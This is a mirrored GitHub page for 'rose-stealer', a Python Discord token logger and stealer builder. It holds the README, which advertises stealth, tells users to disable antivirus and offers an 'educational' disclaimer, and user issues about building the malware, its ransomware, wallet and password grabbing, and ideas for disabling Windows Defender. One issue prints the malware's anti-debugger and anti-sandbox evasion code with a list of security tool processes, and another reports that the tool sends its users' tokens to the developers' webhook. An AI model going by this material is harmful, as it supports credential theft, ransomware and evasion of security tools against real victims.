Git Product home page Git Product logo

rose-stealer_old's Introduction


Python-Powered Discord Token Logger: Max Stealth, Minimal Detection, and a Gorgeous UI Builder!

⚠️ The development team is working on a full rewrite and an entire new version for Rose currently. This one will not receive updates anymore and a new repository is going to get created soon.

We are looking forward to stable release the rewritten version soon. You can check the devwork out at the new repository.

Features

A list of features can be found in our documentation.

Disclaimer

This tool is explicitly designed and provided exclusively for educational intentions. Its primary objective is to illuminate the vulnerabilities that files can be susceptible to, highlighting the need for proactive security measures. It is imperative that this tool is never leveraged for any illegal, unauthorized, or malicious undertakings. Under no circumstances will I assume liability for any detrimental consequences inflicted upon your computing infrastructure. I hereby absolve myself from any complicity in activities of an illicit nature. Emphatically, this tool's utility is confined to didactic objectives.

Please be cognizant of the fact that nestled within the intricate architecture of this tool is an elaborate mechanism with latent potential, which, if wielded in an iniquitous manner, could conceivably lead to the illicit acquisition of Discord Nitro privileges through the exploitation of compromised accounts. Nevertheless, I vehemently discourage any endeavor to explore or exploit this covert facet for personal enrichment or unscrupulous exploits. The primary rationale behind divulging this concealed facet is to underscore the paramount importance of fortifying personal data security and adhering to the ethical deployment of technological instruments.

Setup

Before proceeding, briefly disable your antivirus to avoid accidental removal of important components. Install Python properly, ensuring it's added to PATH. Preferably, use Python 3.11 and uninstall other versions. Thanks!

  • Download repository here.
  • Extract the zip file.
  • Launch UI by executing build.bat.

Problems? Get help!

You can contact us here:

Docs

For more guidance on e.g. the rats or the builder, you should check out the docs folder.

Changelog

The changelog history can be found in our documentation.

Credits

Thanks 💞

Star History Chart

rose-stealer_old's People

Contributors

deepsource-autofix[bot] avatar deepsource-io[bot] avatar glitteru avatar gumbobrot avatar i-skid avatar imgbot[bot] avatar imgbotapp avatar janconel avatar kapoutal91 avatar kdot227 avatar restyled-commits avatar scoobyluvs avatar smthpy avatar suenerve avatar suvan1911 avatar tflsaga avatar xpierroz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

rose-stealer_old's Issues

"Educational Discord Token Grabber"🤓

My name is Gumbobrot. I am 13 years old and live in germany and i suck hitler dick. I am a white boy who thought he was doxxed by some random ass 15 year olds on discord and got scared to shit so much so that I became a white hat skid pro 🔥🔥🔥

Help

Please all the folders and files make my brain hurt, simpler the setup is the better the rat is. I can help you customize your readme. make it look better and other things.

bcuz is looks 🤮 rn:
image

testong

testing some automated stuff

.

.

Opening is not working

opening the v8.py does not start the builder, can you help?

  • and yes, i runned setup.bat and all requirements were installed

not working

bro its been a hour that i build and it still not get done..

Rose devs, what is going on here?

A friend of mine found this repo and ran it. Now the webhook we had assigned sent back to our server their token and other sensitive info. Is this some kind of bug because it is not finished or was this on purpose? Because all they did was to just start main.py in the tools directory. I also saw where the base64 in configuration.py leads to, and seems like it is your webhook. Can you explain what is going on here?

Issue starting builder

Running on a vm

Traceback (most recent call last):
File "C:\Users\Administrator\Desktop\Rose-Injector-main\roseui\builder.py", line 1, in
from dhooks import Webhook, Embed
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'dhooks'

Unhandled Exception Error

Hello, I ran into an issue when attempting to run the compiled executable. I attached a zip below which includes the screenshot of the exception and the compile log. I've tried different versions of python (3.11.4, 3.10, 3.11.5) and also different versions of PyInstaller. I'm not sure if this is an issue necessarily with your code but I thought to just give the heads up since it doesn't execute properly.

Update So I saw that someone else had the same issue here in the closed cases. The solution was to uninstall the requirements.txt and reinstall + going to the latest version of python + disable Windows Defender before new installation. I did that and the Unhandled Exception error had this issue now: "ModuleNotFoundError: No module named 'pygame' ". If it helps, I am using Windows 11 sandbox if that would make any difference in all this :)
Github_Issue.zip

Just some extras

def {self.error_name}(self): 
       try: 
           import key
       except ImportError as e:
           print(f"No module: {{str(e)}}")

   def {self.check_os_name}(self): 
       os_name = platform.system()
       if os_name != 'Windows':
           return "danger"
       return "safe"
   
   def {self.pid_hunt_name}(self):
       def check_process(process_name):
           for process in psutil.process_iter(attrs=['name']):
               if process.info['name'] == process_name:
                   return True
           return False

       processes_to_check = [
           {{'pid': 1616, 'name': 'sysmon.exe'}},
           {{'pid': 2400, 'name': 'frida-winjector-helper-32.exe'}},
           {{'pid': 2464, 'name': 'frida-winjector-helper-64.exe'}},
           {{'pid': 1272, 'name': 'wspsvc.exe'}},
           {{'pid': 664, 'name': 'stigthymwmxu.exe'}},
           {{'pid': 2772, 'name': 'drjzmo.exe'}},
           {{'pid': 1904, 'name': 'avp.exe'}},
           {{'pid': 4000, 'name': 'avpui.exe'}},
           {{'pid': 4188, 'name': 'jhoslg.exe'}},
           {{'name': 'procmon.exe'}},
           {{'name': 'Vsserv.exe'}},
           {{'name': 'Postman.exe'}},
           {{'name': 'ollydbg.exe'}},
           {{'name': 'ProcessHacker.exe'}},
           {{'name': 'tcpview.exe'}},
           {{'name': 'regmon.exe'}},
           {{'name': 'procep.exe'}},
           {{'name': 'idaq.exe'}},
           {{'name': 'idaq64.exe'}},
           {{'name': 'ImmunityDebugger.exe'}},
           {{'name': 'Wireshark.exe'}},
           {{'name': 'dumpcap.exe'}},
           {'name': 'HookExplorer.exe'},
           {{'name': 'ImportREC.exe'}},
           {{'name': 'PETools.exe'}},
           {{'name': 'LordPE.exe'}},
           {{'name': 'SysInspector.exe'}}, 
           {{'name': 'proc_analyzer.exe'}},
           {{'name': 'sysAnalyzer.exe'}},
           {{'name': 'sniff_hit.exe'}},
           {{'name': 'windbg.exe'}},
           {{'name': 'joeboxcontrol.exe'}},
           {{'name': 'joeboxserver.exe'}},
           {{'name': 'ResourceHacker.exe'}},
           {'name': 'x32dbg.exe'},
           {{'name': 'x64dbg.exe'}},
           {{'name': 'Fiddler.exe'}},
           {{'name': 'httpdebugger.exe'}},
           {{'name': 'Sysmon64.exe'}},
           {{'name': 'nioswk.exe'}},
           {{'name': 'EDhVfFCHsBIIflrGw.exe'}},
           {{'name': 'lujazdkmiseqp.exe'}},
           {{'name': 'VmRemoteGuest.exe'}},
           {{'name': 'VirtualBoxVM.exe'}},
           {{'name': 'VBoxSVC.exe'}},
       ]
       for process_info in processes_to_check:
           process_name = process_info['name']
           
           if check_process(process_name):
               return "danger"   
       return "safe"
   
   def{self.Sandbox_name}(self):
       EvidenceOfSandbox = []
       sandboxProcesses = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"
       _, runningProcesses = win32pdh.EnumObjectItems(None,None,'process', win32pdh.PERF_DETAIL_WIZARD)
       for process in runningProcesses:
           for sandboxProcess in sandboxProcesses:
               if sandboxProcess in str(process):
                   if process not in EvidenceOfSandbox:
                       EvidenceOfSandbox.append(process)
                       break
       return EvidenceOfSandbox

Ransomeware error

arguments did not match any overloaded call:
move(self, a0: QPoint): argument 1 has unexpected type 'float'
move(self, ax: int, ay: int): argument 1 has unexpected type 'float'

Also does not grab anything

Add more features

Add more features such steam,wallet,Minecraft,epic,battle net, and more to grabber check powershell token grabber of kdot you can see lot of features it's pretty cool if you gonna add it to rose inject

W Stealer - yuvi (alt)

nice stealer its really good, good job on making it. try making the read me a bit more professional!

Error while opening

I get this error: "python: can't open file 'C:\Users\WDAGUtilityAccount\Desktop\Rose-Grabber-main\components\roseui\builder.py': [Errno 2] No such file or directory"

Bootstrap and ransomware issues

Describe the bug
A clear and concise description of what the bug is.
Error on launch about bootstrap
To Reproduce
Steps to reproduce the behavior:
Make an exe with all features but special including ransomware no anti vm

Expected behavior
Grab passwords and launch ransomware

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • win 10 vm
  • chrome
  • latest

Traceback (most recent call last):
File "main.py", line 1, in
File "", line 1176, in _find_and_load
File "", line 1147, in _find_and_load_unlocked
File "", line 690, in _load_unlocked
File "PyInstaller\loader\pyimod02_importers.py", line 385, in exec_module
File "sysinf.py", line 58, in
IndexError: list index out of range

also doggo ransomware has no attribute doggo ransomware is still an issue but will probably be fixed soon

2 Bugs

I apologize for not providing much information in regards to the template for a bug report.

That said; the bug(s) in question is two things. Once is the 69th line in sysinf.py, where the psutil.sensors_battery() function may return a NoneType value. This as a result errors out when non-laptops are tested on.

Secondly, after fixing the bug on my behalf, I noticed that the stub process repeatedly started itself over and over on process hacker. They always took up the same memory and CPU usage, meaning the process was just spawning itself but never dying.

I'm confident the latter is not caused from fixing the first issue. and If I can find why the process repeatedly starts itself over and over, I will submit a pull request fixing both bugs.

Edit-1 -- Could be because I'm on Python 3.12, where some wheels have not been built for the libraries.

start.vbs

where is the start.vbs file located when i install.bat?

Bootstrap still messsed up in latest version

Traceback (most recent call last):
File "main.py", line 38, in
File "", line 1176, in _find_and_load
File "", line 1147, in _find_and_load_unlocked
File "", line 690, in _load_unlocked
File "PyInstaller\loader\pyimod02_importers.py", line 391, in exec_module
File "bin\sysinf.py", line 56, in
IndexError: list index out of range

Using UAC all features grab wallets, ransomware, output exe, inject, startup.

Help

How to Build Exe file.. also when i tried to click the build botton it doesn't include the .exe file

Idea

make it so that it completely messs up your windows defender to the point where you cannot open it

also make it hide itself in task manager

im done with beaming now anyways

also send me ur discord user lmao

test

This is just a test issue. I wanted to test my notifications and GitHub webhook.

Telegram?

Do you got a telegram to join? I like your work and want to contribute.

Error opening the code

Good afternoon.

I followed the instructions on the 'SETUP' sub-topic from 'README.dm'. When I tried running start.bat, my cmd just popped up for half a second before disappearing again.

For that reason, I'd like to know ALL the requirements that need to be fulfilled in order to run the code. And this includes the smallest of things, such as having an admin account on Windows, having Python installed with admin rights, etc.

Thanks for your time.

"ModuleNotFoundError: No module named 'nicegui' when running Rose-Grabber"

When attempting to load the Rose-Grabber application, I encountered the following error message:

Traceback (most recent call last):
  File "Rose-Grabber-main\components\roseui\builder.py", line 20, in <module>
    from nicegui import ui, app
ModuleNotFoundError: No module named 'nicegui'

I tried to fix the problem by installing

pip install nicegui

but it shows this message after installing

WARNING: Failed to write executable - trying to use .deleteme logic
ERROR: Could not install packages due to an OSError: [WinError 2] The system cannot find the file specified: 'C:\\Python311\\Scripts\\uvicorn.exe' -> 'C:\\Python311\\Scripts\\uvicorn.exe.deleteme'

Error when Loading Up

image
When I installed, i opened the start.bat and it is stuck on the rose image. What do I do?

Rose ransomware issues all errors

Rose ransomware not working. All features enabled except for file spoofer, use SCR for startup, external RATs and pump file.
Errors:
arguments did not match any overloaded call:
move(self, a0: QPoint): argument 1 has unexpected type 'float'
move(self, ax: int, ay: int): argument 1 has unexpected type 'float'
Other unrelated errors:
[Errno 2] No such file or directory: 'C:\Users\TEMP\AppData\Roaming\ROSE_ON_TOP\wifi-stealer_DrtSsfW6JLYTaqYvbvwaCnbD7.txt'

ERROR

after i completed all of the installation process and finished with the bat file, after I run the created .exe file I get these errors:

Traceback (most recent call last):
File "main.py", line 2, in
File "PyInstaller\loader\pyimod03_importers.py", line 495, in exec_module
File "rose_rat.py", line 7, in
File "PyInstaller\loader\pyimod03_importers.py", line 495, in exec_module
File "cv2_init_.py", line 181, in
File "cv2_init_.py", line 153, in bootstrap
File "importlib_init_.py", line 126, in import_module
File "PyInstaller\loader\pyimod03_importers.py", line 495, in exec_module
File "cv2_init_.py", line 181, in
File "cv2_init_.py", line 76, in bootstrap
ImportError: ERROR: recursion is detected during loading of "cv2" binary extensions. Check OpenCV installation.

it wont open

when i try to open it it closes, what file do i open to make it open?

What to do

image
I can't figure out what is causing the error

running the grabber

When i run the grabber to see if it works, it comes up with this error:

Traceback (most recent call last):
  File "main.py", line 2, in <module>
  File "PyInstaller\loader\pyimod02_importers.py", line 385, in exec_module
  File "rose_rat.py", line 2, in <module>
ModuleNotFoundError: No module named '__webhook'

When i say the grabber i mean the file it generates.
Any fixes?

Enable tracemalloc to get the object allocation traceback

C:\Users\Victor\AppData\Roaming\Python\Python311\site-packages\nicegui\nicegui.py:109: RuntimeWarning: coroutine 'AsyncServer.enter_room' was never awaited
sio.enter_room(sid, client.id)
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
image

remembering that I already reinstalled nicegui, take a screenshot showing this.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.